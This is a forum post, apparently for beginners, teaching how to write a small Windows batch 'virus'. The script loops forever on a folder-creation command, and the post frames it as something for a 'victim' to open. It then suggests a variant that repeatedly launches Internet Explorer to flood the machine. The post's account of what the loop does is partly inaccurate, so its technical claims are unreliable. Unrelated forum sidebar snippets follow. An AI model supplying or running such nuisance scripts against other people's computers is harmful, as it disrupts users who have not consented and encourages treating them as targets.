Jump to content

Recommended Posts

Posted

So this is a tutorial on how to make your very first simple windows virus! NOOBS ONLY

 

 

Ok so 1st what your going to want to do is go on your desktop, right click, and make a new text document. We will be writing our code in this document. The coding language we will be using is batch.

 

I know your probably like "HURR DURR THIS IS STUPID" well then GTFO as i said earlier, NOOBS ONLY!

 

Anyway, at the top of the newly created text document, write @echo off .  This basically turns off all un-needed and extra texts.

 

Now  write :Virus < this makes a checkpoint in the program that we can later access or goto. You can change "Virus" to anything as that is only the name of the checkpoint, but MAKE SURE you write : as that is what marks a checkpoint.

 

Now write md Virus . This will create a folder named Virus in the current directory that your victim has opened the Virus in. md marks to create a folder, while Virus is only the name of the folder. You might be thinking this doesnt do much, but you just wait ;)

 

Now for the last part, write goto Virus. What this does is it goes back to the checkpoint (:Virus) which we created earlier. If you changed the name of the checkpoint make sure to change it here as well.

 

Now for the final stage, we need to make windows recognize its a batch file, to do this, click File > Save As > Virus.bat . This will save the file as a .bat or a batch file, which is the coding language we wrote our virus in.

 

the whole code will look like:

 

 

 

@echo off

:Virus

md Virus

goto Virus

 

 

 

Now that you know how to do this, try doing the same thing exept spamming open Internet Explorer, (HINT: Quotation marks: " " open a certain program) To accomplish this, find the directory of IE, and use quotation marks to tell the file to open Internet Explorer.

 

Happy Hacking :)

 

 

Create an account or sign in to comment

You need to be a member in order to leave a comment

Create an account

Sign up for a new account in our community. It's easy!

Register a new account

Sign in

Already have an account? Sign in here.

Sign In Now


  • Posts

    • And Discord: https://discord.gg/3aYqWNqb
    • Ofc: https://discord.gg/3aYqWNqb
    • You can find some H5 skins shared in old L2 modding Discords, but most of the higher‑quality ones are either paid or come bundled with full client edits. I usually mix in commissioned work and whatever I can patch myself. On a side note, I fund a lot of these commissions by selling off game items through instant sell cs2 skins, which has been a quick way for me to get some cash for projects.
    • There is no need for gRPC in this case, even tho originally it was gRPC based but since we don't need it to be bi-directional, we switched to simple http requests for the web calls and SSEs for the data streamed from the server. There are distributed locks in place to precent race conditions between actions that can happen between multiple web instances and the server.   Local models can also be slow depending on the model, and most external models can actually be faster than local ones if you use Flash 2.5 or something along those lines. I am running on 512GB of Unified Memory on my Mac Studio M3 Ultra so the speed of the local model for a small model is pretty good but I tested it with Gemini too and it works equally as fast and in some cases faster. The way it works is that I'm using pgvector (one of the benefits of moving to Postgres) to search the data and see what the player can see etc and there is some batching of the next few actions for 2-4 seconds for the user until the next LLM request fires. The batching also includes branching on logic so if they for example fall under some HP they will move to kiting instead of attacking or maybe they heal etc.   Everything is authed and permission-based. The server and the backend of the frontend have secure communication between them, either with a symmetric key (not recommended for production) or a certificate (the recommended way), so there is no worry. It's all tied to the account's access level, etc., so nobody can make an action that they normally wouldn't be allowed to do. Even the MCP is token-based, and there are prompt injection protections in place. The MCP is audited, and every mutation needs confirmation. The admin area is only accessible to the admin account anyway so normal users can't access it.  
  • Topics

×
×
  • Create New...

Important Information

This community uses essential cookies to function properly. Non-essential cookies and third-party services are used only with your consent. Read our Privacy Policy and We have placed cookies on your device to help make this website better. You can adjust your cookie settings, otherwise we'll assume you're okay to continue..